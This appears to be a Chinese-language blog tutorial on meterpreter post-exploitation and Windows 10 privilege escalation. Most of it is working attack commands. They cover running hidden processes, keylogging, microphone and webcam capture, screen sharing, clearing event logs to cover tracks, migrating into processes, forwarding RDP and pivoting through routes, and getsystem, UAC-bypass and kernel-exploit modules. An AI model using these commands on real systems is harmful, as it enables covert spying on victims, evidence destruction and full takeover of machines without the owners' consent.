文章目录
- 一、远程执行命令
- 二、WIN10提权
- 三、其他提权方法
- 1.**getsystem**
- 2.**bypassuac**
- 3.**内核漏洞提权**
一、远程执行命令
书接上回,监听之后可以远程执行指令
#列出当前所在目录
meterpreter > pwd
#列出本地当前所在目录
meterpreter > lpwd
#跳转指定目录
meterpreter > cd c:\\
#查看当前目录
meterpreter > dir
#指定上传文件
meterpreter > upload hack.exe
#使用execute命令在目标系统中执行命令
meterpreter > execute -f notepad.exe #在对方电脑上,弹出一个记事本.exe
meterpreter > edit a.txt Hello! #编辑文本
meterpreter > execute -f "notepad.exe a.txt"#使用记事本打开文本
meterpreter > execute -f calc.exe #在对方电脑上,弹出计算器
meterpreter > execute -H -i -f cmd.exe #以后台,隐藏的方式,运行 cmd
输入:exit 退出
#屏幕截图
meterpreter > screenshot
#屏幕分享
meterpreter > screenshare
#vnc只能看不能操作
meterpreter > run vnc
#键盘监听
meterpreter > keyscan_start
meterpreter > keyscan_stop
#麦克风监听 秒
meterpreter > record_mic -d 5
#查看摄像头
meterpreter > webcam_list
1: Chicony USB2.0 Camera
#使用设备1拍照
meterpreter > webcam_snap -i 1
#实时监控
meterpreter > webcam_stream -i 1
#help查看命令
meterpreter > help
#清除windows中的应用程序日志、系统日志、安全日志
meterpreter > clearav
二、WIN10提权
在Windows中,超级管理员权限和系统权限是两种不同的访问权限级别。
超级管理员权限(或称为管理员权限)是Windows操作系统中最高的权限级别之一。具有超级管理员权限的用户拥有对操作系统的完全访问权限,可以执行系统范围的修改、安装和卸载应用程序、更改系统设置等操作。超级管理员权限对系统文件和关键系统组件具有完全控制权。
系统权限是指系统级别的权限,在Windows操作系统中用于控制系统服务和其他系统特性的访问级别。这包括管理网络连接、配置系统时间、监视系统事件日志等功能。系统权限由操作系统自动管理,并且只有特定的系统进程和服务具有这些权限。
需要注意的是,超级管理员权限是一个用户角色,而系统权限是操作系统内部使用的权限级别。超级管理员权限可以被分配给不同的用户账户,而系统权限只能由操作系统进程和服务使用。
在日常使用电脑时,我们通常以管理员权限登录操作系统,这样可以执行大多数常见的管理任务。只有在特定情况下,例如需要修改系统设置或进行高级系统维护时,才需要使用超级管理员权限。
#查看当前用户
meterpreter > getuid
Server username: WHOISME\13038#查看进程 -s查看系统进程Win10
meterpreter > ps -s
Filtering on SYSTEM processes...
No matching processes were found.
#查看进程
meterpreter > ps
Process List
============PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----0 0 [System Process]4 0 System224 4 Registry800 4 smss.exe1140 1000 csrss.exe1172 1652 dwm.exe1240 1324 svchost.exe1244 1000 wininit.exe1252 1236 csrss.exe#当前程序PID
meterpreter > getpid
Current pid: 6576
#win10可以迁移进程系统PID完成提权
meterpreter > migrate 1240#转移到非系统用户,查看资源管理器(用户)进程
meterpreter > ps -S explorer
Filtering on 'explorer'
Process List
============PID PPID Name Arch Session User Path--- ---- ---- ---- ------- ---- ----8060 10100 explorer.exe x64 1 WHOISME\13038 C:\Windows\explorer.exe
#迁移进程至目标PID
meterpreter > migrate 8060#其他思路#将目标机的3389端口转发到本地6666端口
portfwd add -l 6666 -p 3389 -r 127.0.0.1
#添加路由
run autoroute –h #查看帮助
run autoroute -s 192.168.159.0/24 #添加到目标环境网络
run autoroute –p #查看添加的路由
三、其他提权方法
参考CSDN博主「白昼安全」的原创文章方法
1.getsystem
getsystem
getsystem工作原理:
①getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。
②getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。
③Windows服务已启动,导致与命名管道建立连接。
④该进程接收连接并调用ImpersonateNamedPipeClient,从而为SYSTEM用户创建模拟令牌。
然后用新收集的SYSTEM模拟令牌产生cmd.exe,并且我们有一个SYSTEM特权进程。
2.bypassuac
内置多个bypassuac脚本,原理有所不同,使用方法类似,运行后返回一个新的会话,需要再次执行getsystem获取系统权限,如:
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
如何使用bypassuac.rb脚本:
msf > use exploit/windows/local/bypassuac
msf > set SESSION 2
msf > run
3.内核漏洞提权
可先利用enum_patches模块 收集补丁信息,然后查找可用的exploits进行提权
meterpreter > run post/windows/gather/enum_patches #查看补丁信息
msf > use exploit/windows/local/ms13_053_schlamperei
msf > set SESSION 2
msf > exploit